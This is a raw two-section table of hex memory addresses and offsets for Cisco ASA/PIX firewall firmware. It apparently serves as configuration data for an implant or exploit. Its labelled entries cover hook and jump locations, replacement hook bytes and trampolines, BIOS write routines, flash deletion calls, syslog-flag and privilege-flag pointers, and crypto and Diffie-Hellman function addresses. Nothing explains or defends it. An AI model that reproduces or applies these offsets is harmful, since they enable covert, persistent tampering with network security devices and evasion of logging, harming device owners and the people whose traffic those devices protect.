; --- SECTION I ---
;
0x10072200            
0x7e9000              
0x0   0x00ab9b18      
0x1   0x00ab84c8      
0x2   0x00116300      
0x3   0x0059d938      
0x4   0x00116430      
0x5   0x01059c10      
0x6   0x010447d0      
0x7   0x01063430      
0x8   0x00ab8288      
0x9   0x0104e620      
0xa   0x00115920      
0xb   0x00000014      
0xc   0x00000010      
0xd   0x0000005c      
0xe   0x00000078      
0xf   0x01051c90      
0x15  0x00114190      
0x16  0x00114a00      
0x17  0x00115010      
0x18  0x00898080      
0x19  0x0000001c      
0x1a  0x013a8e80      
0x1b  0x04            
0x1c  0x0c            
0x1d  0x24            
0x1e  0x00            
0x1f  0x10            
0x20  0x0059f248      
0x21  0x005a1318      
0x22  0x0059f1e8      
0x23  0x005b2348      
0x24  0x00ea09e8      
0x25  0x00ea7548      
0x26  0x0059afb8      
0x27  0x005a3338      
0x28  0x008ebdf0      
0x2a  0x3c            
0x2b  0x34            
0x2c  0x1c            
0x2d  0x0074e086      
0x2e  0x000001d0      
0x2f  0x01328620      
0x30  0x0119e860      
0x31  0x00000014      
0x32  0x00000020      
0x33  0x00000018      
0x34  0x0130ad90      
0x35  0x013a8620      
0x36  0x008ec750      
0x37  0x00000127      
0x38  0x4c            
0x39  0x68            
0x3a  0x00000420      
0x3b  0x004d50e8      
0x3c  0x004d51c8      
0x3d  0x004d4a88      
0x3e  0x004d4f98      
0x3f  0x00000018      
0x40  0x013c1c50      
0x41  0x005bbb08      
0x42  0x01055160      
0x43  0x005894c8      
0x44  0x004e6404      
0x45  0x007ed800      
0x46  0x0085e2f1      
0x47  0x2c            
0x48  0xb4            
;
; --- END OF SECTION I ---
;
:EOS:
;
; --- SECTION II ---
;
HookLocation              0x0074d8bf      
HookedCall                0x00750418      
JmpLocation               0x0078f9da      
InterfaceAddr             0x0119e860      
InterfaceLeng             0x0000019c      
IntSecurityOffset         0x1c            
IntNameOffset             0x0000016c      
IntNumOffset              0x00000127      
IntVlanOffset             0x10            
IntIPOffset               0x20            
IntNetmaskOffset          0x24            
FlashClassAddr            0x00000000      
CryptoDeviceAddr          0x013adc80      
ArpTableAddrPtr           0x01190b68      
NumInterfaces             0x00000000      
IfaceStruct2              0x00000000      
IfaceStruct2Len           0x00            
BiosClassAddr             0x013b92b0      
BiosWriteAddr1            0x00422850      
BiosWriteAddr2            0x00425720      
BiosWriteAddr3            0x004250d0      
BiosWriteAddr4            0x00425f20      
BiosWriteOffset           0x00000020      
FlashMkdirAddress         0x004d5b78      
ASAFlashRmdirAddress      0x011631e7      
PIXFlashRmdirAddress      0x0041afc0      
ASAFlashRmfileAddress     0x01162e5a      
PIXFlashRmfileAddress     0x0041ae40      
FlashDirlistAddress       0x004d53a8      
FlashGetSizeAddress       0x004d4968      
FlashChmodAddress         0x004d56d8      
FlashMoveFileAddress      0x004d5808      
FlashGetFileInfoAddress   0x004d5dd8      
FlashGetSpaceAddress      0x004d6dd8      
FlashFileInfoSizeOffset   0x0000002c      
GetPlatformStringAddr     0x01049fd0      
ASARestatFlashFlagAddr    0x013dcb20      
AnnounceFunc              0x001161f0      
DevIoctlOffset            0x70            
DuartTtyAddr              0x010f4510      
CIStartFunc               0x0015d680      
CommandListAddr           0x011be1f0      
DeviceListPtrAddr         0x012cf9b0      
DeviceNextPtrOffset       0x50            
StrcmpFuncAddr            0x01055fc0      
SyslogFlagPtrAddr         0x014739f8      
PGDGETValue               0x85b00002      
PGDPUSHValue              0x85b00003      
PGDSETValue               0x85b00000      
StdChOffset               0xb0            
StdErrOffset              0xb4            
PrivFlagOffset            0x0c            
UnameOffset               0x14            
EnvPtrOffset              0xbc            
SyslogOffset              0x00000a38      
Open                      0x00116300      
ChannelConfigOffset       0x08            
InputModeOffset           0x08            
InputModeEsc              0x20            
WatchDogTimeout           0x010ccf10      
UpTimeCounter             0x013a8620      
Display_uptime_addr       0x00165ea0      
Inserted_code_addr        0x00178f72      
i2cReadByte               0x0105aba0      
i2cWriteByte              0x0105a9f0      
CLIHookAddress            0x0015db3f      
AvailMemoryPtr            0x013a93e0      
;
srand               0x01051cf0
BN_new              0x00f98198
BN_free             0x00f980f8
BN_mod_exp          0x00fd0cb8 
BN_CTX_new          0x00f99688
BN_CTX_free         0x00f99708
BN_bin2bn           0x00f98828
BN_bn2bin           0x00f98948 
BN_bn2hex           0x00fdd428
BN_num_bits         0x00f97ff8
DH_p                0x010e19b0
aesEncrypt          0x00181260
aesKeySet           0x0017d7e0
slimHookAddr        0x0074e33c
slimTrampoline      0x004c6bd4
HookByte1           0x8b
HookBytes2to5       0xff855c7b
InterfaceOffset     0x0000000c
codepageBase        0x013a8e60
codeSectionStart    0x00100000
codeSectionEnd      0x010cb8e8
;
; --- END OF SECTION II ---
;
:EOS:
;
